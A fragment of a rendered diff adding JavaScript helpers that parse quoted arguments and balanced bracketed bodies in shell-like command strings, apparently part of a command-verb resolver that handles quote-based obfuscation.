// quoted arg ends (the next iteration will hit the quote and toggle
|
|
232
|
+
// inDouble naturally).
|
|
233
|
+
i = afterFlag;
|
|
234
|
+
continue;
|
|
235
|
+
}
|
|
236
|
+
}
|
|
237
|
+
}
|
|
238
|
+
i++;
|
|
239
|
+
}
|
|
240
|
+
return found;
|
|
241
|
+
}
|
|
242
|
+
/** Read a balanced `open`/`close` body starting at `start` (already past the open). */
|
|
243
|
+
function readBalanced(input, start, open, close) {
|
|
244
|
+
let depth = 1;
|
|
245
|
+
let i = start;
|
|
246
|
+
let inSingle = false;
|
|
247
|
+
let inDouble = false;
|
|
248
|
+
while (i < input.length) {
|
|
249
|
+
const c = input[i];
|
|
250
|
+
if (inSingle) {
|
|
251
|
+
if (c === "'")
|
|
252
|
+
inSingle = false;
|
|
253
|
+
i++;
|
|
254
|
+
continue;
|
|
255
|
+
}
|
|
256
|
+
if (c === "'") {
|
|
257
|
+
inSingle = true;
|
|
258
|
+
i++;
|
|
259
|
+
continue;
|
|
260
|
+
}
|
|
261
|
+
if (c === '"') {
|
|
262
|
+
inDouble = !inDouble;
|
|
263
|
+
i++;
|
|
264
|
+
continue;
|
|
265
|
+
}
|
|
266
|
+
if (!inDouble) {
|
|
267
|
+
if (c === open)
|
|
268
|
+
depth++;
|
|
269
|
+
else if (c === close) {
|
|
270
|
+
depth--;
|
|
271
|
+
if (depth === 0)
|
|
272
|
+
return { content: input.slice(start, i), endIndex: i + 1 };
|
|
273
|
+
}
|
|
274
|
+
}
|
|
275
|
+
i++;
|
|
276
|
+
}
|
|
277
|
+
return null;
|
|
278
|
+
}
|
|
279
|
+
/**
|
|
280
|
+
* Read the next quoted (single, double) or bare token starting at `start`,
|
|
281
|
+
* returning its unquoted contents.
|
|
282
|
+
*/
|
|
283
|
+
function readQuotedArg(input, start) {
|
|
284
|
+
let i = start;
|
|
285
|
+
while (i < input.length && (input[i] === ' ' || input[i] === '\t'))
|
|
286
|
+
i++;
|
|
287
|
+
if (i >= input.length)
|
|
288
|
+
return null;
|
|
289
|
+
const q = input[i];
|
|
290
|
+
if (q === '"' || q === "'") {
|
|
291
|
+
let j = i + 1;
|
|
292
|
+
let buf = '';
|
|
293
|
+
while (j < input.length) {
|
|
294
|
+
const c = input[j];
|
|
295
|
+
if (c === '\\' && q === '"' && j + 1 < input.length) {
|
|
296
|
+
buf += input[j + 1];
|
|
297
|
+
j += 2;
|
|
298
|
+
continue;
|
|
299
|
+
}
|
|
300
|
+
if (c === q)
|
|
301
|
+
return buf;
|
|
302
|
+
buf += c;
|
|
303
|
+
j++;
|
|
304
|
+
}
|
|
305
|
+
return null;
|
|
306
|
+
}
|
|
307
|
+
// Bare token — read up to whitespace
|
|
308
|
+
let j = i;
|
|
309
|
+
while (j < input.length && input[j] !== ' ' && input[j] !== '\t')
|
|
310
|
+
j++;
|
|
311
|
+
return input.slice(i, j);
|
|
312
|
+
}
|
|
104
313
|
/**
|
|
105
314
|
* Returns the resolved command verb for a subcommand string. Strips wrapping
|
|
106
315
|
* quotes, escape backslashes, and the inert-double-quote obfuscation
|